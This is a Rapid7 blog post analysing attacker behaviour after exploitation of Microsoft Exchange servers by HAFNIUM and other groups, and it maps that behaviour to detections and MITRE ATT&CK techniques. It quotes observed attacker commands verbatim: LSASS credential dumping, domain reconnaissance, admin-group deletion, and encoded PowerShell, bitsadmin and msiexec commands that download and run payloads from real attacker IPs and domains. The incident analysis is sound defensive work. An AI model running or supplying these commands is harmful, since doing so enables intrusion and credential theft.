PEOPLE</div></div></a></li><li class="dropdown-item"><a href="/open-source/"><div class="dropdown-text">Open Source<div class="dropdown-category">STRENGTHENING CYBERSECURITY</div></div></a></li><li class="dropdown-item"><a href="/about/public-policy/"><div class="dropdown-text">Public Policy<div class="dropdown-category">ENGAGEMENT & ADVOCACY</div></div></a></li><li class="dropdown-item"><a href="/about/rapid7-cybersecurity-partner-boston-bruins/"><div class="dropdown-text">Boston Bruins<div class="dropdown-category">Our Partnership</div></div></a></li></ul></div></li><li class="main-nav__link "><a class="" href="/partners/" aria-role="button" aria-haspopup="" aria-controls="9a9a3228-5e55-45d9-bcfc-5224e84b0b06">Partners</a></li></ul></div><div class="main-nav__utility"><ul><li class="dropdown language"><a href="#" class="dropdown-trigger has-toggle ">en</a><div class="dropdown-content right-align"><ul class="dropdown-menu"><li class="dropdown-item selected"><a href="#">English</a></li></ul></div></li><li class="signin"><a href="https://insight.rapid7.com/saml/SSO"><img src="/Areas/Docs/includes/img/r7-nav/icon-lock.svg" alt=""/>Sign In</a></li></ul></div></div></nav><section class="search-bar hide"><div class="container flex flex-jc-c flex-ai-c"><form action="/search" class="search-content flex flex-jc-c flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" autoComplete="off" placeholder="Search"/><input type="submit" class="search-submit button blue" value="Search"/><a class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></form></div></section><div class="search-overlay overlay "></div><nav class="sub-nav "><div class="container flex flex-jc-sb"><a class="logo circle-button" href="https://www.rapid7.com/"><img src="/Areas/Docs/includes/img/r7-nav/Rapid7_logo-short.svg" alt="Rapid7 logo"/></a><div class="sub-nav__links flex"><ul class="flex flex-ai-c"><li class="sub-nav__title"><a href="/blog/" title="Blog">Blog</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/vulnerability-management/">Vulnerability Management</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/mdr-managed-detection-response/">MDR</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/detection-and-response/">Detection & Response</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/cloud-security/">Cloud Security</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/application-security/">App Security</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/metasploit/">Metasploit</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tags/">All Topics</a></li></ul></div><div class="sub-nav__utility"><a class="search" role="button" tabindex="0"><i class="r7-icon r7-icon-search-magnify"></i></a><a class="button button--primary" href="/trial/insight/">Start Trial</a><a class="to-top circle-button" tabindex="0"><i class="r7-icon r7-icon-arrow-chevron-up-solid"></i></a></div></div></nav></header> </div> <div class="off-canvas-content" data-off-canvas-content> <div id="menuOverlay" class="reveal-overlay"></div> <section class="longhero"> <div class="grid-container"> <div class="grid-x grid-padding-x expanded"> <div class="medium-12 cell"></div> </div> </div> </section> <div class="pageContent"> <section class="blog-single-post"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="small-12 medium-6 medium-offset-1 large-7 large-offset-1 cell blog-single-post__main-column"> <div class="grid-y"> <div class="blog-single-post__main-column--heading"> <h1>Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange</h1> <div> <ul class="blog-post-info"> <li class="date">Mar 23, 2021</li> <li class="time">18 min read</li> <li class="name"> <a href="/blog/author/eoin/">Eoin Miller</a> </li> </ul> <ul class="blog-post-social float-right"> <li><a href="https://www.linkedin.com/shareArticle?mini=true&url=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/&title=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&summary=In+recent+weeks%2c+there+has+been+quite+a+lot+of+reporting+on+the+exploitation+of+the+latest+disclosed+vulnerabilities+in+Microsoft%e2%80%99s+Exchange+Server+by+an+attacker+referred+to+as+HAFNIUM." class="linkedin" onclick="window.open(this.href, 'linkedin-share', 'width=520,height=570');return false;"></a></li> <li><a href="https://twitter.com/intent/tweet?text=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&url=https%3a%2f%2fwww.rapid7.com%2fblog%2fpost%2f2021%2f03%2f23%2fdefending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange%2f" class="twitter-x" onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;"></a></li> <li><a href="https://www.facebook.com/sharer/sharer.php?u=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" class="facebook" onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;"></a></li> </ul> </div> </div> <div class="post-content"> <p><i class="updated-at">Last updated at Wed, 05 Apr 2023 20:01:43 GMT</i></p> <p>In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in <a href="https://aka.ms/ExchangeVulns">Microsoft’s Exchange Server</a> by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.</p><blockquote> <p>“Running as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.”<br> Source: <a href="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities">Application Pool Identities</a></p> </blockquote> <p>Because this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the <a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege">principle of least privilege</a> and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim’s environment.</p><p>While the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.</p><p>Over the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple <a href="https://attack.mitre.org/techniques/T1110/003/">password spraying</a> attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in <a href="https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/">Citrix Netscaler</a>, <a href="https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization">Progress’ Telerik</a>, and <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/">Pulse Secure’s Pulse Connect Secure</a>, to name a few.</p><p>While the method of gaining a foothold in a victim’s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim’s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of “living off the land” techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.</p><p>Because the way an attacker moves and acts can remain unchanged for so long, Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our <a href="https://www.rapid7.com/fundamentals/what-is-managed-detection-and-response-mdr/">Managed Detection and Response</a> Security Operations Center and <a href="https://www.rapid7.com/services/security-consulting/incident-response-services/">Incident Response</a> teams to develop and update our detections in <a href="https://www.rapid7.com/products/insightidr/">InsightIDR</a>’s <a href="https://docs.rapid7.com/insightidr/aba-detections">Attacker Behavior Analytics</a> to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. </p><p>Last, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.</p><h2 id="hafnium-related-activity">HAFNIUM-related activity</h2><p>Through the use of our existing detections, Rapid7 observed attacker behavior using a <a href="https://attack.mitre.org/software/S0020/">China Chopper</a> web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7’s <a href="https://docs.rapid7.com/insight-agent/">Insight Agent</a> from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained <a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">virtually unchanged since at least 2013</a>. These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.rapid7.com/content/images/2021/03/image1-6.png" class="kg-image"><figcaption><em>Source: </em><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf"><em>The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)</em></a></figcaption></figure><p>Rapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange’s Outlook Web Access, it will have an environment variable and value set to the following:</p><p><code>APP_POOL_ID=MSExchangeOWAAppPool</code></p> <p>With this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with <a href="https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/">InsightIDR’s Attacker Behavior Analytics</a>, the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. </p><p>Using China Chopper, the attacker executed the Microsoft Sysinternals utility <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procdump">procdump64.exe</a> against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as <a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a> to <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump">extract passwords from the memory dump of this process</a>. This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is “ThisIsMyPassword1!”, when forced to change, they will likely just increment the digit at the end to “ThisIsMyPassword2!”. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.</p><p>The following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:</p><p>Procudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:</p><pre><code>cmd /c cd /d C:\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E] cmd /c cd /d E:\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E] </code></pre> <p>Reconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:</p><pre><code>cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&HOSTNAME" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E] cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&nltest" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E] cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&HOSTNAME" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E] cmd /c cd /d c:\\temp&tasklist&echo [S]&cd&echo [E] cmd /c cd /d E:\\logs&tasklist &echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Domain computers" /do&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&tasklist /v&echo [S]&cd&echo [E] </code></pre> <p>Enumeration of further information about specific processes on the victim system. The process smex_master.exe is from <a href="https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html">Trend Micro’s ScanMail</a> and unsecapp.exe is from <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c">Microsoft Windows</a>.</p><pre><code>cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E] </code></pre> <p>Deletion of groups in Active Directory using the net.exe command executed via China Chopper:</p><pre><code>cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E] </code></pre> <p>Network connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:</p><pre><code>cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E] cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&c:\windows\temp\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&c:\windows\temp\curl.exe -vv -k -m 10 https://www.google.com > C:\windows\temp\b.log 2>&1&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E] cmd /c cd /d c:\\temp&ping www.google.com&echo [S]&cd&echo [E] </code></pre> <p>Second-stage payload retrieval commands executed via China Chopper webshell:</p><pre><code>cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E] </code></pre> <p>Filesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:</p><pre><code>\cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&findstr Request "\\<REDACTED_HOSTNAME>\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ErrorFF.aspx&echo" [S]&cd&echo [E] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookEN.aspx'&echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\TimeoutLogout.aspx'&echo [S] </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Net Command Deleting Exchange Admin Group</li><li>Attacker Tool - China Chopper Webshell Executing Commands</li><li>Attacker Technique - ProcDump Used Against LSASS</li></ul><h2 id="mitre-attck-techniques-observed-in-hafnium-related-activity">MITRE ATT&CK techniques observed in HAFNIUM-related activity</h2><ul><li><a href="https://attack.mitre.org/techniques/T1003/">T1003</a> - OS Credential Dumping</li><li><a href="https://attack.mitre.org/techniques/T1003/001/">T1003.001</a> - OS Credential Dumping: LSASS Memory</li><li><a href="https://attack.mitre.org/techniques/T1005">T1005</a> - Data from Local System</li><li><a href="https://attack.mitre.org/techniques/T1007">T1007</a> - System Service Discovery</li><li><a href="https://attack.mitre.org/techniques/T1033">T1033</a> - System Owner/User Discovery</li><li><a href="https://attack.mitre.org/techniques/T1041/">T1041</a> - Exfiltration Over C2 Channel</li><li><a href="https://attack.mitre.org/techniques/T1047">T1047</a> - Windows Management Instrumentation</li><li><a href="https://attack.mitre.org/techniques/T1057">T1057</a> - Process Discovery</li><li><a href="https://attack.mitre.org/techniques/T1059">T1059</a> - Command and Scripting Interpreter</li><li><a href="https://attack.mitre.org/techniques/T1059/003">T1059.003</a> - Command and Scripting Interpreter: Windows Command Shell</li><li><a href="https://attack.mitre.org/techniques/T1071">T1071</a> - Application Layer Protocol</li><li><a href="https://attack.mitre.org/techniques/T1071/001">T1071.001</a> - Application Layer Protocol: Web Protocols</li><li><a href="https://attack.mitre.org/techniques/T1074">T1074</a> - Data Staged</li><li><a href="https://attack.mitre.org/techniques/T1074/001">T1074.001</a> - Data Staged: Local Data Staging</li><li><a href="https://attack.mitre.org/techniques/T1083/">T1083</a> - File and Directory Discovery</li><li><a href="https://attack.mitre.org/techniques/T1087">T1087</a> - Account Discovery</li><li><a href="https://attack.mitre.org/techniques/T1087/001">T1087.001</a> - Account Discovery: Local Account</li><li><a href="https://attack.mitre.org/techniques/T1087/002">T1087.002</a> - Account Discovery: Domain Account</li><li><a href="https://attack.mitre.org/techniques/T1098">T1098</a> - Account Manipulation</li><li><a href="https://attack.mitre.org/techniques/T1105/">T1105</a> - Ingress Tool Transfer</li><li><a href="https://attack.mitre.org/techniques/T1190">T1190</a> - Exploit Public-Facing Application</li><li><a href="https://attack.mitre.org/techniques/T1203">T1203</a> - Exploitation For Client Execution</li><li><a href="https://attack.mitre.org/techniques/T1218">T1218</a> - Signed Binary Proxy Execution</li><li><a href="https://attack.mitre.org/techniques/T1218/007/">T1218.007</a> - Signed Binary Proxy Execution: Msiexec</li><li><a href="https://attack.mitre.org/techniques/T1505/">T1505</a> - Server Software Component</li><li><a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a> - Server Software Component: Web Shell</li><li><a href="https://attack.mitre.org/techniques/T1518">T1518</a> - Software Discovery</li><li><a href="https://attack.mitre.org/techniques/T1518/001">T1518.001</a> - Software Discovery: Security Software Discovery</li><li><a href="https://attack.mitre.org/techniques/T1531">T1531</a> - Account Access Removal</li><li><a href="https://attack.mitre.org/techniques/T1583">T1583</a> - Acquire Infrastructure</li><li><a href="https://attack.mitre.org/techniques/T1583/003">T1583.003</a> - Acquire Infrastructure: Virtual Private Server</li><li><a href="https://attack.mitre.org/techniques/T1587">T1587</a> - Develop Capabilities</li><li><a href="https://attack.mitre.org/techniques/T1587/001">T1587.001</a> - Develop Capabilities: Malware</li><li><a href="https://attack.mitre.org/techniques/T1587/004">T1587.004</a> - Develop Capabilities: Exploits</li><li><a href="https://attack.mitre.org/techniques/T1588">T1588</a> - Obtain Capabilities</li><li><a href="https://attack.mitre.org/techniques/T1588/001">T1588.001</a> - Obtain Capabilities: Malware</li><li><a href="https://attack.mitre.org/techniques/T1588/002">T1588.002</a> - Obtain Capabilities: Tool</li><li><a href="https://attack.mitre.org/techniques/T1588/005">T1588.005</a> - Obtain Capabilities: Exploits</li><li><a href="https://attack.mitre.org/techniques/T1588/006">T1588.006</a> - Obtain Capabilities: Vulnerabilities</li><li><a href="https://attack.mitre.org/techniques/T1595">T1595</a> - Active Scanning</li><li><a href="https://attack.mitre.org/techniques/T1595/001">T1595.001</a> - Active Scanning: Scanning IP Blocks</li><li><a href="https://attack.mitre.org/techniques/T1595/002">T1595.002</a> - Active Scanning: Vulnerability Scanning</li></ul><h2 id="non-hafnium-related-activity">Non-HAFNIUM-related activity</h2><p>Rapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.</p><h3 id="minidump-and-makecab-attacker">Minidump and Makecab attacker</h3><p>This attacker was seen uploading batch scripts to execute the Microsoft utility <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)">dsquery.exe</a> to enumerate all users from the Active Directory domain. The attacker would also use the <a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll">Minidump function in comsvcs.dll</a> with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab">makecab.exe</a> to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.</p><pre><code>C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat dsquery * -limit 0 -filter objectCategory=person -attr * -uco powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Minidump via COM Services DLL</li></ul><h3 id="malicious-dll-attacker">Malicious DLL attacker</h3><p>This attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist">klist</a>, in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.</p><pre><code>c:\windows\system32\cmd.exe /c tasklist tasklist c:\windows\system32\cmd.exe /c net time /do net time /do c:\windows\system32\cmd.exe /c rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt c:\windows\system32\cmd.exe /c klist c:\windows\system32\cmd.exe /c tasklist tasklist c:\windows\system32\cmd.exe /c netstat -ano netstat -ano </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="opera-browser-and-cobalt-strike-attacker">Opera Browser and Cobalt Strike attacker</h3><p>This attacker was seen using common techniques to download scripts with Microsoft’s <a href="https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool">BITSAdmin</a>. These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913">CVE-2018-18913</a>). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of <a href="https://www.cobaltstrike.com/">Cobalt Strike</a>, a favorite tool of attackers that distributes ransomware:</p><pre><code>C:\Windows\System32\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\Users\public\2.bat C:\Windows\System32\cmd.exe /c c:\Users\public\2.bat powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA= powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA msiexec.exe -k powershell Start-Sleep -Seconds 10 cmd /c C:\\users\\public\\opera\\opera_browser.exe C:\\users\\public\\opera\\opera_browser.exe powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA </code></pre> <p>Base64 decoded strings passed to PowerShell:</p><pre><code>(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\users\public\opera\code') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\users\public\opera\opera_browser.png') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\users\public\opera\opera_browser.dll') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\users\public\opera\opera_browser.exe') </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Download And Execute With Background Intelligent Transfer Service</li><li>Attacker Technique - URL Passed To BitsAdmin</li></ul><h3 id="six-character-webshell-attacker">Six-character webshell attacker</h3><p>This attacker was seen uploading webshells and copying them to other locations within the webroot.</p><pre><code>cmd /c copy C:\inetpub\wwwroot\aspnet_client\discover.aspx "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_6_CHARACTER_STRING>.aspx" </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="encoded-powershell-download-cradle-attacker">Encoded PowerShell download cradle attacker</h3><p>This attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac">getmac.exe</a> utility to enumerate information about the network adapters.</p><pre><code>cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA== C:\Windows\system32\getmac.exe /FO CSV </code></pre> <p>Base64 decoded strings passed to PowerShell:</p><pre><code>IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e') </code></pre> 